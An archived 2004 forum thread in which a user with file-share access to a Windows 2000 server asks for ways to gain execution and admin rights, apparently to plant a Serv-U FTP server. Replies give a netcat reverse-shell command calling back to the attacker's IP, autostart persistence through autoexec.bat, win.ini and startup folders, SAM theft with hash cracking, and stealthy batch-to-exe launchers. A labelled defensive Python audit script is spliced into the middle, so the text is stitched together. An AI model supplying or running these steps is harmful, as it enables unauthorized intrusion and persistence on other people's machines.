Full Version: One Stupid Question
SeNSeMaNN
hi

i have access to c$ / d$ and admin$ on my box, can upload, see and download every file, but have no rights to execute, is there any possibility to get these rights with downloading something of this system perhaps to get admin axx ?!

help would be very n1 !!

mfg
buzzons
psexec?
SeNSeMaNN
i said that i can't execute ;o( what do you mean ?!
slynx
ooo....such angry people on this forum :>

if you can wait until the box reboots, you could place a file inside the
startup folder, which is a technique used by worms like BugBear.....

other than that and the obvious exploitation of open netbios vulnerabilities....no, i
don't think so ;p
gilbert0
First of all, there are no stupid questions, just stupid people.
There is an answer to your question:

You just put your commands in autoexec.bat and wait till the pc reboots. A well performed google search should provide you with more information.
that way you could set up a netcat listening on your pc
nc -l -p9999 -vv

and include this command in autoexec.bat
nc your.ip 9999 -e cmd.exe

This should give you a cmd shell when the pc reboots. (You would have to upload nc.exe first).


I hope this helps,


Gilbert
Partizaan
Connect to the box with DameWare Utilities
A psexec-like shell is included.

I guess u have pass and login ? If u have that it is plain simple netbios hack.
SeNSeMaNN
hehe not so easy guys....

1.) i am not stupid
2.) port 139 is closed and netbios is off.....
3.) cause of 2.) dameware nt does not work
4.) i have a non administration axx
5.) i have c$ and d$ and admin$ access to the machine but not to every folder....
6.) have full upload and download winnt directory root..
7.) if i would place a netcat.bat in the startup folder which startup folder do i have to use ?? default user ??
8.) psexec = not enough permissions ! access denied !


you see that it is not that kind of easy.....

mfg
sense
SnakO
yeah,

use dameware or psexec..

that nc works too or just create a .bat on C: and let that execute on startup

then if you search this forum you can enter commands in that bat to make another admin user.. etc.
like that you can login with your own password.. and give yourself exec rights
nolimit
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.
allik
QUOTE (nolimit @ Jun 24 2004, 11:33 AM)
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.

would be quite difficult to do this without exec rights
but you can try this
CODE
net user Administrator *


then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said it's your box so that wouldn't be a problem
SeNSeMaNN
QUOTE (allik @ Jun 24 2004, 11:58 AM)
QUOTE (nolimit @ Jun 24 2004, 11:33 AM)
If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords.

would be quite difficult to do this without exec rights
but you can try this
CODE
net user Administrator *


then u can set a new pw for the Administrator but i think the admin would notice this very fast but you said it's your box so that wouldn't be a problem

yes but how to do this without shell ?!

QUOTE

If you have access to admin$ share, pwdump the hash, then LC4/RC it for admin passwords


no chance because of missing exec rights...... !! i have no ftp access only through \\server\c$

mfg
allik
damn you're right, my fault
so you have to do the method with reboot
SeNSeMaNN
QUOTE (allik @ Jun 24 2004, 12:54 PM)
damn you're right, my fault
so you have to do the method with reboot

yes but there is still the question which startup folder i have to use !!

this folder ?

\\server\c$\Documents and Settings\Default User\Menu Démarrer\Programmes\Démarrage

or this one ?

\\server\c$\Documents and Settings\All Users\Menu Démarrer\Programmes\Démarrage
dont-staY
The following are files that programs can autostart from on bootup:

1. c:\autoexec.bat
2. c:\config.sys
3. windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8. windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt


All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:

Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup
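
An added example, not part of any post in this thread: a defender-side check that reads win.ini and system.ini text and reports the autostart keys from the list above whose values are not in an approved baseline. The sample files and the baseline are constructed assumptions.

```python
"""Audit legacy INI autostart entries (win.ini / system.ini) against a baseline."""

# (section, key) pairs from the list above that name a program to start.
AUTOSTART_KEYS = {
    ("windows", "load"), ("windows", "run"),
    ("boot", "shell"), ("boot", "scrnsave.exe"),
}

def autostart_entries(ini_text):
    """Return [(section, key, value)] for every non-empty autostart key."""
    found, section = [], None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if sep and value and (section, key) in AUTOSTART_KEYS:
            found.append((section, key, value))
    return found

def unexpected(ini_text, baseline):
    """Entries whose value is not in the approved baseline (case-insensitive)."""
    approved = {b.lower() for b in baseline}
    return [e for e in autostart_entries(ini_text) if e[2].lower() not in approved]

# Constructed sample win.ini carrying a Run= entry under [windows].
SAMPLE_WIN_INI = """\
; for 16-bit app support
[fonts]
[windows]
Run=c:\\servu\\servu.exe
[Mail]
MAPI=1
"""
# Constructed system.ini with only a shell entry and an empty screensaver key.
SAMPLE_SYSTEM_INI = "[boot]\nshell=Explorer.exe\nSCRNSAVE.EXE=\n"
BASELINE = ["explorer.exe"]   # assumed approved values for this host

if __name__ == "__main__":
    for name, text in (("win.ini", SAMPLE_WIN_INI), ("system.ini", SAMPLE_SYSTEM_INI)):
        for section, key, value in unexpected(text, BASELINE):
            print(f"{name}: [{section}] {key}={value} is not in the baseline")
```

Run against copies of the files taken at a known-good point and again later, the difference between the two reports is the set of autostart entries added in between.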
SeNSeMaNN
QUOTE (dont-staY @ Jun 24 2004, 01:32 PM)
The following are files that programs can autostart from on bootup:

1. c:\autoexec.bat
2. c:\config.sys
3. windir\wininit.ini
4. windir\winstart.bat
5. windir\win.ini - [windows] "load"
6. windir\win.ini - [windows] "run"
7. windir\system.ini - [boot] "shell"
8. windir\system.ini - [boot] "scrnsave.exe"
9. windir\dosstart.bat
10. windir\system\autoexec.nt
11. windir\system\config.nt


All Users Startup Folder - For Windows XP, 2000, and NT, this folder is used for programs that should be auto started for all users who will login to this computer. It is generally found at:

Windows XP C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Windows NT C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
Windows 2000 C:\Documents and Settings\All Users\Start Menu\Programs\Startup

so i can put my netcat.exe and netcat.bat into the all user startup folder ?????
or should i only add a shortcut to the startup folder and the files perhaps into the system32 folder ?!

p.s.: can't find the winstart.bat and dosstart.bat on the system !!!!!
SeNSeMaNN
hm, no upload access to Documents and Settings ;o( any other idea what to do ?!
T3cHn0b0y
Get that (filtered) sam file! Rip the bitch from C:\WINNT\Repair shove it on your own box, pwdump the password hashes and crack the fuckers with LC mother (filtered) 4!

Peace
T3cHn0b0y
Sorry man I'm feelin weird
SeNSeMaNN
fucki* access denied on the sam file o_O
allik
just do it like that
echo start c:\mynetcatpath\nc.exe>>c:\windir\win.ini

then wait/hope for reboot and your netcat is started
SeNSeMaNN
you mean to netcat.bat !!??? echo without cmd ?! interesting.........

i can open and save the win.ini file... so what do i exactly have to add there ??!
Icingtaupe
[Edit]

Erf, you can edit the Win.ini ... type [windows], or under the [windows] section, type "Run=yourexe.exe", in this case the command for netcat, read before. In the next startup, netcat will be run and give you a shell

[/edit]

Well...

Can you modify the Win.ini ? Or The system.ini ?

If you can, just upload your netcat, create a bat which you compile into a .exe ( no shell used in this manner ) ( Use StealthBatch to compile it into an exe ), type the command [boot] or [windows] followed by your file ( nclaunch.exe, why not ) and it will make a stealth load of your exe ...

Another try, can you modify YOUR system.ini, upload and then replace the remote file ? It's an idea....
SeNSeMaNN
kk, now win.ini looks like this........


; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......


correct or wrong ?!
strasharo
So much effort from so many people that wanted to help for one f****d servu? Weird...
SeNSeMaNN
QUOTE (strasharo @ Jun 27 2004, 05:48 PM)
So much effort from so many people that wanted to help for one f****d servu? Weird...

its just a simple ftp, and one of the smallest... why not to get ftp root ?!

QUOTE

So much effort


yes, and i am very happy about it.... but such a post like yours is really (filtered)** up.. and doesn't help.... so go home to your mummy and flame there..

strasharo
Blah, better close your mouth. I'm bored of serv-u kids jumping around and making havoc... So better go to dig some potatoes...
Icingtaupe
QUOTE (strasharo @ Jun 27 2004, 05:48 PM)
So much effort from so many people that wanted to help for one f****d servu? Weird...

I don't know how you work, Strasharo, but I'm here to help people and make their projects work, not to say "Sh***, this iz an useless topic, whY do u help him ?"...

I think your post is useless, in fact... or, maybe you want to make people angry, then, continue like this, but I really think this is useless...

Well, his project works ? He has root access on the box ? Well, if it does, i think the topic can be terminated... but posting to say "if i was in your shoes, i might not help him"... it's stupid ... let him do what he wants, and let us do what we want, if we have time to lose for other people and help them, I think it's better than have time to lose to don't help people and say what you say ...

That's all, I can go out, now...

Edit : Hu, and I'm bored about people that tell them better than other and don't help others...

Forget my English, it's not my native language...
cougar
why do people get upset about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.

So why not help each other, if you don't like the thread, --> don't reply?


SeNSeMaNN
QUOTE (cougar @ Jun 28 2004, 11:56 PM)
why do people get upset about such things? This is a security board, and most of the times people also use this information to setup/secure a box --> beside securing their own servers.

So why not help each other, if you don't like the thread, --> don't reply?

that's my opinion too. just wanna have ftp root access so i want to do it this way...
but what about my win.ini modification, is it now correct or wrong ?!

QUOTE

; for 16-bit app support
[fonts]
[windows]
Run=c:\servu\servu.exe <-------- servu 2.5 exe file
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
asf=MPEGVideo
asx=MPEGVideo
.....
......



greetz
brOmstar
try it at home
SeNSeMaNN
QUOTE (brOmstar @ Jul 4 2004, 09:39 AM)
try it at home

just want to be sure that my system starts correctly, because i don't wanna use the whole day to set up a new win2000 server

hmmmmmmm


something to win.ini and system.ini
my system has got win2000. and the win.ini and the system.ini are for 16 bit support! does win2000 use these things ?!

what can i put into autoexec.bat ?! o_O

mfg